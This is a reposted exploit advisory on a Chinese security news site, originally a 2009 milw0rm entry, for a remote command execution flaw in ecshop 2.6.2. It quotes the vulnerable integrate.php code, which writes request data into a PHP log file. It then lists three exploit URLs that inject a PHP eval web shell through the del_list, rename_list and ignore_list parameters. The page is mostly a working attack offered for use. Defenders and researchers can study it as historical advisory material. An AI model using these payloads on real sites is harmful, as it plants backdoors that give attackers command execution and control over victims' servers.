为了顺应当前形势和更好的发展,黑基网已于9月19日正式更名为【安基网】,域名更换为www.safebase.cn,请卸载旧的APP并安装新的APP,给您带来不便,敬请理解!谢谢

黑基Web安全攻防班
安基网 首页 IT技术 安全攻防 查看内容

ecshop 2.6.2 远程命令执行漏洞

2009-6-2 11:22| 投稿: security

摘要: ######################### Securitylab.ir ######################## # Application Info: # Name: ecsh...
######################### Securitylab.ir ######################## # Application Info: # Name: ecshop # Version: 2.6.2 # Website: http://www.ecshop.com ################################################################# # Discoverd By: Securitylab.ir # Website: http://securitylab.ir # Contacts: info@securitylab[dot]ir & K4mr4n_st@yahoo.com ################################################################# #=========================================================== # :: integrate.php :: # # if ($_REQUEST['act'] == 'sync') # { # $size = 100; # ...... # $tasks = array(); # if ($task_del > 0) # { # $tasks[] = array('task_name'=>sprintf($_LANG['task_del'], $task_del),'task_status'=>'<span id="task_del">' . $_LANG['task_uncomplete'] . '<span>'); # $sql = "SELECT user_name FROM " . $ecs->table('users') . " WHERE flag = 2"; # $del_list = $db->getCol($sql);//$del_list # } # if ($task_rename > 0) # { # $tasks[] = array('task_name'=>sprintf($_LANG['task_rename'], $task_rename),'task_status'=>'<span id="task_rename">' . $_LANG['task_uncomplete'] . '</span>'); # $sql = "SELECT user_name, alias FROM " . $ecs->table('users') . " WHERE flag = 3"; # $rename_list = $db->getAll($sql);//$rename_list # } # if ($task_ignore >0) # { # $sql = "SELECT user_name FROM " . $ecs->table('users') . " WHERE flag = 4"; # $ignore_list = $db->getCol($sql);//$ignore_list # } # .... # $fp = @fopen(ROOT_PATH . DATA_DIR . '/integrate_' . $_SESSION['code'] . '_log.php', 'wb'); # $log = ''; # if (isset($del_list)) # { # $log .= '$del_list=' . var_export($del_list,true) . ';'; # } # if (isset($rename_list)) # { # $log .= '$rename_list=' . var_export($rename_list, true) . ';'; # } # if (isset($ignore_list)) # { # $log .= '$ignore_list=' . var_export($ignore_list, true) . ';'; # } # fwrite($fp, $log); # fclose($fp); # $smarty->assign('tasks', $tasks); # $smarty->assign('ur_here',$_LANG['user_sync']); # $smarty->assign('size', $size); # $smarty->display('integrates_sync.htm'); # } # # # http://site.com/admin/integrate.php?act=sync&del_list=<?php%20eval($_POST[cmd])?> # http://site.com/admin/integrate.php?act=sync&rename_list=<?php%20eval($_POST[cmd])?> # http://site.com/admin/integrate.php?act=sync&ignore_list=<?php%20eval($_POST[cmd])?> #=========================================================== ################################################################# # Securitylab Security Research Team ################################################################### # milw0rm.com [2009-05-29]

小编推荐:欲学习电脑技术、系统维护、网络管理、编程开发和安全攻防等高端IT技术,请 点击这里 注册黑基账号,公开课频道价值万元IT培训教程免费学,让您少走弯路、事半功倍,好工作升职加薪!



免责声明:本文由投稿者转载自互联网,版权归原作者所有,文中所述不代表本站观点,若有侵权或转载等不当之处请联系我们处理,让我们一起为维护良好的互联网秩序而努力!联系方式见网站首页右下角。


鲜花

握手

雷人

路过

鸡蛋

相关阅读

最新评论

最新

返回顶部